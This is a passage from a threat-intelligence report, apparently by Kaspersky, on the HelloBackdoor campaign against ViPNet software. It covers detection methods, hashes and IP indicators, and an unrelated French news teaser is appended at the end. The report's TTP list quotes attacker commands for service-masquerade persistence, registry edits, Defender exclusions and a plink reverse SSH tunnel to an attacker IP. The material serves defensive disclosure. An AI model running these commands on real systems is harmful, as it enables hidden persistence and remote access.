analyzing the strings in the HelloBackdoor backdoor, we established that during compilation, Rust packages (crates) were downloaded from the mirror mirrors.ustc.edu.cn. Most likely, these strings remained in the malicious files unintentionally. However, the probability of using “false flags” implanted by attackers to complicate the attribution process cannot be excluded. At present, we link this campaign to the activities of an unknown Chinese-speaking APT group with a low degree of confidence. Recommendations Given that ViPNet software is not the first time being used by advanced attackers to conduct cyberattacks, we recommend paying special attention to the protection of workstations with this software. In particular, network traffic monitoring should be configured on the ports specified in the article for timely detection of signs of compromise. Countering complex targeted attacks requires a comprehensive approach that combines security technologies operating at various stages of the cyberattack lifecycle. Such a multi-level security model helps not only to detect but also to prevent incidents of this class. This approach is embedded in the architecture of the Kaspersky Symphony line of solutions, designed to protect businesses from APT-level threats, including attacks similar to the one described in this article. Kaspersky solutions detect this threat using the following verdicts: Trojan.Win32.Agentb.ttoe, Trojan.Win64.Convagent.gen, Trojan.Win64.Agent.smgpqx HEUR:Trojan.Win64.DllHijacking.gen Detection by Kaspersky solutions Kaspersky security solutions, such as Kaspersky Endpoint Detection and Response Expert, successfully detect malicious activity within the described attacks. One practical method of detection is monitoring renamed PuTTY/Plink binaries rather than relying on the file name: even if the executable is named frontpage.exe, its PE header, version, strings, and hash match the original Plink, which is confirmed by EDR events. Additionally, it is worth paying attention to the specific command line with which the process was launched. The KEDR Expert solution detects this activity using the using_plink_or_putty_for_port_forwarding rule. It is also important to monitor Process Injection into svchost.exe originating from the ViPNet update process itcsrvup64.exe, since this component should not legitimately inject code into system processes. Such behavior is a characteristic indicator of HelloInjector activity, which uses a trusted and signed process to mask malicious injection. The KEDR Expert solution detects this activity using the vipnet_load_library_code_injection rule. Another effective way to detect malicious activity associated with ViPNet is monitoring network traffic. The Kaspersky Anti Targeted Attack (KATA) solution with the NDR module detects this activity using the IDS module and a Suricata rule for the HelloBackdoor backdoor activity. The rule is implemented based on the first packet expected by the malware. It accepts TCP connections on port 443, expecting to receive the command 47c6235b4d2611184 (part of the MD5 hash of the string “hello\n“), which activates the backdoor. The Kaspersky Managed Detection and Response service detects this attack using the following indicators: Monitoring the creation of the wtsapi32.dll library in the C:\Program Files (x86)\InfoTeCS\VIPNet Update System directory. Monitoring the launch of unusual processes (not typical for ViPNet, lacking an InfoTeCS signature) by the ViPNet update process ("Itcsrvup64.exe" or "Itcsrvup.exe"). Creation of library files (.dll) in a directory associated with ViPNet (by default, ViPNet Update System or VIPNET CLIENT) by ViPNet processes. Atypical activity (file creation/process execution) from an instance of the svchost.exe process. Creation of executable files in directories that are writable by default (%ProgramData%, %TEMP%, %SystemRoot%\Temp, C:\Users\Public, music|pictures|videos|contacts|links|libraries). Monitoring the creation of tunnels using ssh or plink processes (identification is performed based on the original PE file name, not the executable file name); the detection is based on the presence of substrings like port:address:port and their variations in the command line. Indicators of Compromise HelloBackdoor 16C211C96735F2FAE9361B89BD7A31BF 1BFE2B9493128574907A8279256A8BCC f9eed2f0158dc98e7012fb809152209c – #new HelloBackdoor Droppers: 6001829A128FE264B4403138700C11A8 – infotecs\vipnet client\puh.exe – #new EE4FF46DDD8489E81447962F927BC3F6 – infotecs\vipnet client\store.exe – #new Utility for adding exclusions to Windows Defender: 41c938b3cd7e55d4077e34976929b140 — #new wtsapi32.dll B103CD21280B4061F88B2BCC51394894 9F5606A0755BC633B9BD7DB6D179C09E 0CFDFFC56F0FA325D0C4D24780B46597 5.39.253[.]206 176.32.34[.]135 – #new Detected TTPs: — #new T1569.002 — System Services: Service Execution – “cmd” /c sc start UrBackupClientBackend T1016 — System Network Configuration Discovery – “cmd” /c arp -a – “cmd” /c routeprint T1049 — System Network Connections Discovery – “cmd” /c netstat -ano T1018 — Remote System Discovery – “cmd” /c ping mail.ru -n 2 T1082 — System Information Discovery – `”cmd” /c systeminfo T1057 — Process Discovery – “cmd” /c tasklist T1007 — System Service Discovery – “cmd” /c sc query UrBackupClientBackend T1083 — File and Directory Discovery – “cmd” /c dir temp*.tmp – “cmd” /c dir $temp\*.tmp – “cmd” /c dir amgmt* – “cmd” /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669 – “cmd” /c dir $public\libraries\ – “cmd” /c dir d:\WindowsImageBackup T1005 — Data from Local System – “cmd” /c type $temp\TS_E9E3.tmp – “cmd” /c type $temp\Acr6F3D.tmp T1074.001 — Local Data Staging – “cmd” /c copy appdata\infotecs\*\APN000B.txt $public\libraries\ T1070.004 — Indicator Removal: File Deletion – “cmd” /c del $windir\amgmt.dll – “cmd” /c del $public\libraries\APN000B.txt T1543.003 — Create or Modify System Process: Windows Service – sc stop AppMgmt – sc delete AppMgmt – sc create AppMgmt binpath= “system32\svchost.exe -k netsvcs” type= share start= auto displayname= “Application Management” – sc description AppMgmt “Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start.” – sc failure AppMgmt reset= 0 actions= restart/0 T1112 — Modify Registry – reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32$selfname.dll – reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain T1036 — Masquerading (service, description, and DLL masquerade as the legitimate Application Management) – “cmd” /c copy $windir\amgmt* $system32\ T1059.003 — Execution of auxiliary scripts – “cmd” /c $windir\amgmt.bat – “cmd” /c $windir\insru.cmd T1105 — Ingress Tool Transfer – “cmd” /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o”$windir T1562.001 — Impair Defenses: Disable or Modify Tools – “cmd” /c \$windir\puh.exe add $windir\autoit3.exe white T1059 / T1218 — Proxy execution via AutoIt – “cmd” /c \$windir\autoit3.exe \$windir\data.dat T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH – c:\users[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]

  • RGPD et travaux académiques : comment anonymiser les données des personnes interrogées ?
    par UnderNews le 16 juillet 2026 à 13h52

    Dans le domaine universitaire, la collecte de données personnelles est devenue une étape incontournable lors de la réalisation de mémoires, thèses ou enquêtes. Depuis l’application du règlement général sur la protection des données (RGPD), les exigences entourant le traitement des données se sont durcies, obligeant chaque chercheur à adopter des pratiques strictes pour protéger l’identité The post RGPD et travaux académiques : comment anonymiser les données des personnes interrogées ? first appeared on UnderNews.

A lire également